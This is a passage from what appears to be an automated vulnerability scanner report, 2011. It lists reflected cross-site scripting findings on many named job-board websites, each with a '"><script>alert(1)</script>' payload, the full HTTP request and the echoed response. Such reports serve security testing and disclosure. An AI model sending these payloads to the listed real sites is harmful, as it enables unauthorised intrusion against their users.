Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103836

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.employmentcrossing.com/?c9d32"><script>alert(1)</script>3c4df51b6d0=1">
...[SNIP]...

3.58. http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8299"><script>alert(1)</script>be9f4647928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8299"><script>alert(1)</script>be9f4647928=1 HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=noidta3npdj58s0aohjj586je3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117890

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.energycrossing.com/?d8299"><script>alert(1)</script>be9f4647928=1">
...[SNIP]...

3.59. http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce7e"><script>alert(1)</script>f51101cb458 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ce7e"><script>alert(1)</script>f51101cb458=1 HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=aut4ejh39idf5up0qhelu1l544; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136570

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.engineeringcrossing.com/?2ce7e"><script>alert(1)</script>f51101cb458=1">
...[SNIP]...

3.60. http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1390"><script>alert(1)</script>3782757edeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a1390"><script>alert(1)</script>3782757edeb=1 HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rvmtdhrtapom8nr77l4ajo2407; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149274

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.entrylevelcrossing.com/?a1390"><script>alert(1)</script>3782757edeb=1">
...[SNIP]...

3.61. http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47df8"><script>alert(1)</script>9bba834dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?47df8"><script>alert(1)</script>9bba834dd35=1 HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:14 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q47km4obkvavliijoe7tgvqa65; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103948

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.environmentalcrossing.com/?47df8"><script>alert(1)</script>9bba834dd35=1">
...[SNIP]...

3.62. http://www.environmentalsafetyhealthcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd0"><script>alert(1)</script>232068dd834 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ccd0"><script>alert(1)</script>232068dd834=1 HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0erqag1b3vhfvubgk4socfl113; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109501

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.environmentalsafetyhealthcrossing.com/?9ccd0"><script>alert(1)</script>232068dd834=1">
...[SNIP]...

3.63. http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8ac"><script>alert(1)</script>39847d1dfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9c8ac"><script>alert(1)</script>39847d1dfd=1 HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=s019do29bsalhop53kerknqic5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:23 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115915

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.erpcrossing.com/?9c8ac"><script>alert(1)</script>39847d1dfd=1">
...[SNIP]...

3.64. http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b15"><script>alert(1)</script>6a4f6925f22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?58b15"><script>alert(1)</script>6a4f6925f22=1 HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9pmt5q5vtv14ne77hequloic12; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130398

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.execcrossing.com/?58b15"><script>alert(1)</script>6a4f6925f22=1">
...[SNIP]...

3.65. http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30174"><script>alert(1)</script>f3d7d566073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30174"><script>alert(1)</script>f3d7d566073=1 HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9tjnfteftbcltcfl79d8lkupi5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.facilitiescrossing.com/?30174"><script>alert(1)</script>f3d7d566073=1">
...[SNIP]...

3.66. http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c380"><script>alert(1)</script>e02d8294ca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8c380"><script>alert(1)</script>e02d8294ca2=1 HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:00 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mka5rd1b1uorq9h0i3qmfjjpj1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.financialservicescrossing.com/?8c380"><script>alert(1)</script>e02d8294ca2=1">
...[SNIP]...

3.67. http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298f0"><script>alert(1)</script>ffeb2e14da1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?298f0"><script>alert(1)</script>ffeb2e14da1=1 HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e48qt9e609488dmqmu8f8i5c36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109901

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.foodservicescrossing.com/?298f0"><script>alert(1)</script>ffeb2e14da1=1">
...[SNIP]...

3.68. http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28102"><script>alert(1)</script>aa78d4ce328 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?28102"><script>alert(1)</script>aa78d4ce328=1 HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:29 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nm20dvfkbsbjk7ge1970hpse21; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 98025

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.fundraisingcrossing.com/?28102"><script>alert(1)</script>aa78d4ce328=1">
...[SNIP]...

3.69. http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bc72"><script>alert(1)</script>c4813ec5858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6bc72"><script>alert(1)</script>c4813ec5858=1 HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rir4ndkuk4qrb18g4imjg1qgc0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109405

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.giscrossing.com/?6bc72"><script>alert(1)</script>c4813ec5858=1">
...[SNIP]...

3.70. http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b65"><script>alert(1)</script>8b14ad25588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35b65"><script>alert(1)</script>8b14ad25588=1 HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rpbso16tqsrohpa7vs4tao5g00; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:54 GMT
